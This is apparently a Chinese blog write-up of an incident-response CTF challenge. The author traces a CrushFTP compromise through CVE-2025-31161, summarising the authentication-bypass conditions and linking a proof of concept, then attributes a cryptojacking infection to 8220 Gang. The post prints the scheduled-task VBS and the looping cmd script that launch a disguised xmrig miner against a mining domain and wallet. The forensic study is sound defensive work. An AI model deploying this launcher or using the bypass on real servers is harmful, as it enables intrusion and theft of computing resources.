solar5月

solar 5月

后话补充 ps:官方wp更为详细,并且官p发出来后感觉博文写的有部分歧义,看官p优先↓

https://mp.weixin.qq.com/s/E802Gk0e60jStexNJ8Ji8Q

忘报名了,没题目看,所以直接找wp看。看了看题目感觉还是有点收获的

5156 (S) :Windows 筛选平台已允许连接。

参考链接
https://mp.weixin.qq.com/s/IQ5Va1BZktcvnwio31H9mA
https://www.cnblogs.com/mX1a0/articles/18906665

攻击者使用什么漏洞获取了服务器的配置文件?

题目描述:某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器,flag格式为:flag

我做题的话很优先看浏览器的历史记录的,很容易定位问题,当然,真正应急不该这么干。

可以看到这个Ftp软件被打开过,那出题人文章应该就在这

image-20250602194102566

用过日志可以定位到是cve-2025-31161

具体详细可以看看以下两个链接

https://mp.weixin.qq.com/s/V2eGUbxZnGjuvpX4g_nXqA
https://github.com/Immersive-Labs-Sec/CVE-2025-31161/blob/main/cve-2025-31161.py

这里直接搬运总结一下


必须提供一个名为 CrushAuth 的 Cookie。

  • 此 Cookie 无需有效。

  • c2f HTTP 参数必须与 CrushAuth Cookie 的最后4个值匹配。

  • Authorization 标头依赖于特定的字符串前缀 AWS4-HMAC-SHA256,并且 Credential 字段可以设置为任何不包含波浪号 (~) 并后跟正斜杠 (/) 的有效 CrushFTP 用户帐户名。

  • 如果您看到包含 AWS4-HMAC-SHA256 Credential=crushadmin/ 字符串的活动,请务必查看该条目周围,确保没有引用 currentAuth Cookie 值。


查看ftp日志这两处都吻合

image-20250602201548645

image-20250602202918432

系统每天晚上系统都会卡卡的帮小明找到问题出在了那?

题目描述:flag为配置名称(无空格)

很有计划任务的味道,去看看,xmrig挖矿软件的图标改都不改

image-20250602202025926

恶意域名是什么?

这是计划任务的vbs,调用sqlwscript.cmd

set ws=createobject("wscript.shell")
ws.Run """sqlwscript.cmd""",0

sqlwscript.cmd如下

@echo off
cd /d "%~dp0"
:start
sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0
goto start

可以看到很明显的指定参数:b.oracleservice.top域名、后面一串是矿池个人地址

疑似是什么组织发动的攻击?

把恶意域名搜搜,可以发现是一个叫8220 Gang的组织

攻击者C2服务器IP是什么?

这题卡手了

先是把netstat的看了个遍,然后ftp的日志也交了不行,4624的也卡住了

看回powershell的日志,发现存在外连下载文件,ip和ftp日志的攻击ip一致,但是找不到对应的cel.ps1文件,r-studio爆搜已删除文件都找不到

image-20250602210625021

但是知道了攻击者应该是用powershell请求c2服务器

然后就是5156事件id搜查外连过的ip,通过之前一系列的时间可以知道,攻击时间具体在5.27日23时左右

5156 (S) :Windows 筛选平台已允许连接。

image-20250602211519976

posted @ 2025-06-02 21:19  eth258  阅读(30)  评论(0)    收藏  举报